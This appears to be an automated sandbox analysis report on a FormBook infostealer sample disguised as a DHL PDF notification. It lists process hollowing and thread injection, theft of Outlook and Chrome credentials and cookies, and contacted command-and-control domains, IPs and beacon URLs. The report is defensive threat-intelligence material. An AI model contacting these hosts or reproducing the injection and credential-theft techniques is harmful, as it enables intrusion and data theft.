          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0040CF43 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_004018F8 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1200000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\ldndbi.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeThread register set: target process: 3320
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3320
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeProcess created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
          Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.514810946.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.263500910.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.256320918.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_00401A05 cpuid
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts512
          Process Injection          		3
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager15
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830435 Sample: DHL_Notification_pdf.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Multi AV Scanner detection for domain / URL 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 9 DHL_Notification_pdf.exe 19 2->9         started        process3 file4 28 C:\Users\user\AppData\Local\Temp\ldndbi.exe, PE32 9->28 dropped 12 ldndbi.exe 1 9->12         started        process5 signatures6 58 Multi AV Scanner detection for dropped file 12->58 60 Detected unpacking (changes PE section rights) 12->60 62 Maps a DLL or memory area into another process 12->62 15 ldndbi.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 20 explorer.exe 2 6 15->20 injected process9 dnsIp10 30 bohndigitaltech.com 162.241.24.110, 49709, 49710, 80 UNIFIEDLAYER-AS-1US United States 20->30 32 kunimi.org 219.94.129.181, 49705, 49706, 80 SAKURA-CSAKURAInternetIncJP Japan 20->32 34 11 other IPs or domains 20->34 46 System process connects to network (likely due to code injection or exploit) 20->46 48 Performs DNS queries to domains with low reputation 20->48 24 cmmon32.exe 13 20->24         started        signatures11 process12 dnsIp13 36 www.yongleproducts.com 24->36 50 Tries to steal Mail credentials (via file / registry access) 24->50 52 Tries to harvest and steal browser information (history, passwords, etc) 24->52 54 Modifies the context of a thread in another process (thread injection) 24->54 56 Maps a DLL or memory area into another process 24->56 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL_Notification_pdf.exe54%ReversingLabsWin32.Trojan.FormBook
          DHL_Notification_pdf.exe46%VirustotalBrowse
          DHL_Notification_pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\ldndbi.exe19%ReversingLabsWin32.Trojan.Lazy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.ldndbi.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.ldndbi.exe.5d0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          kunimi.org4%VirustotalBrowse
          bohndigitaltech.com5%VirustotalBrowse
          rifleroofers.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.kunimi.org0%Avira URL Cloudsafe
          http://kunimi.org/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsC0%Avira URL Cloudsafe
          http://www.buymyenergy.com0%Avira URL Cloudsafe
          http://www.bohndigitaltech.com0%Avira URL Cloudsafe
          http://www.rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP0%Avira URL Cloudsafe
          http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby100%Avira URL Cloudmalware
          http://www.buymyenergy.comReferer:0%Avira URL Cloudsafe
          http://www.admet01.clubReferer:0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/0%Avira URL Cloudsafe
          http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP100%Avira URL Cloudmalware
          http://www.adoptiveimmunotech.com/hpb7/100%Avira URL Cloudmalware
          http://www.mindsetlighting.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.0dhy.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.amirah.cfd/hpb7/100%Avira URL Cloudphishing
          http://www.bisarropainting.com/hpb7/:0%Avira URL Cloudsafe
          http://www.amirah.cfd100%Avira URL Cloudphishing
          http://www.traindic.top/hpb7/100%Avira URL Cloudmalware
          http://www.bohndigitaltech.com/hpb7/0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/0%Avira URL Cloudsafe
          http://www.madliainsalu.comReferer:0%Avira URL Cloudsafe
          http://www.0dhy.xyz0%Avira URL Cloudsafe
          http://www.bohndigitaltech.com/hpb7/Xz.0%Avira URL Cloudsafe
          http://www.creative-shield.com/hpb7/0%Avira URL Cloudsafe
          http://www.kotelak.ru0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/I0%Avira URL Cloudsafe
          http://www.amirah.cfdReferer:0%Avira URL Cloudsafe
          http://www.kotelak.ru/hpb7/0%Avira URL Cloudsafe
          http://www.admet01.club100%Avira URL Cloudmalware
          http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP100%Avira URL Cloudmalware
          http://www.creative-shield.com/hpb7/:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com/hpb7/j100%Avira URL Cloudmalware
          http://www.bisarropainting.com/hpb7/0%Avira URL Cloudsafe
          http://www.kotelak.ruReferer:0%Avira URL Cloudsafe
          http://www.denko-kosan.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK0%Avira URL Cloudsafe
          http://www.madliainsalu.com0%Avira URL Cloudsafe
          http://www.rifleroofers.com0%Avira URL Cloudsafe
          http://www.denko-kosan.com0%Avira URL Cloudsafe
          http://www.rifleroofers.comReferer:0%Avira URL Cloudsafe
          http://www.denko-kosan.comReferer:0%Avira URL Cloudsafe
          http://www.buymyenergy.com/hpb7/0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyzReferer:0%Avira URL Cloudsafe
          http://www.madliainsalu.com/hpb7/0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.comReferer:0%Avira URL Cloudsafe
          http://www.creative-shield.com0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com0%Avira URL Cloudsafe
          http://www.rifleroofers.com/hpb7/0%Avira URL Cloudsafe
          http://www.creative-shield.comReferer:0%Avira URL Cloudsafe
          http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH10%Avira URL Cloudsafe
          http://www.bisarropainting.comReferer:0%Avira URL Cloudsafe
          http://www.traindic.top100%Avira URL Cloudmalware
          http://www.yongleproducts.com/hpb7/100%Avira URL Cloudmalware
          http://www.admet01.club/hpb7/100%Avira URL Cloudmalware
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.yongleproducts.com0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyz100%Avira URL Cloudmalware
          http://www.bohndigitaltech.comReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kunimi.org
          		219.94.129.181
          		truetrueunknown
          bohndigitaltech.com
          		162.241.24.110
          		truetrueunknown
          www.0dhy.xyz
          		198.46.160.97
          		truetrue
            		unknown
            rifleroofers.com
            		67.222.24.48
            		truetrueunknown
            www.yongleproducts.com
            		1.13.186.125
            		truetrue
              		unknown
              www.traindic.top
              		162.0.231.77
              		truetrue
                		unknown
                denko-kosan.com
                		49.212.180.95
                		truetrue
                  		unknown
                  www.bohndigitaltech.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.denko-kosan.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.rifleroofers.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.kunimi.org
                        		unknown
                        		unknowntrue
                          		unknown
                          www.amirah.cfd
                          		unknown
                          		unknowntrue
                            		unknown
                            www.bisarropainting.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZPtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.kunimi.org/hpb7/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZPtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.traindic.top/hpb7/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.bohndigitaltech.com/hpb7/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.denko-kosan.com/hpb7/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZPtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.denko-kosan.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGKtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.rifleroofers.com/hpb7/true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.kunimi.orgexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                		high
                                https://duckduckgo.com/ac/?q=146E771M.5.drfalse
                                  		high
                                  http://www.buymyenergy.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.mindsetlighting.xyz/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://kunimi.org/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCexplorer.exe, 00000004.00000002.523730403.0000000014FCA000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.00000000056BA000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.bohndigitaltech.comexplorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.amirah.cfdexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqbycmmon32.exe, 00000005.00000002.509147113.0000000000F05000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://search.yahoo.com?fr=crmas_sfpfcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                    		high
                                    http://www.0dhy.xyz/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.amirah.cfd/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://www.buymyenergy.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bisarropainting.com/hpb7/:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.admet01.clubReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.adoptiveimmunotech.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.madliainsalu.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kunimi.org/hpb7/Iexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.creative-shield.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kotelak.ruexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.0dhy.xyzexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bohndigitaltech.com/hpb7/Xz.explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.amirah.cfdReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kotelak.ru/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.creative-shield.com/hpb7/:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
